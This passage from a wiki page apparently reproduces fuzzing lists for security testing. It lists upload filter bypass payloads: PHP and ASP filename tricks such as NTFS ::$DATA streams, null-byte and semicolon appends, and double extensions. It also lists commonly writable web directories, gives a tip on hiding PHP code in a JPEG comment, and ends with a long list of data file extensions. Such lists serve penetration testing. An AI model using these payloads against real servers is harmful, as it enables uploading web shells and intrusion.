{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
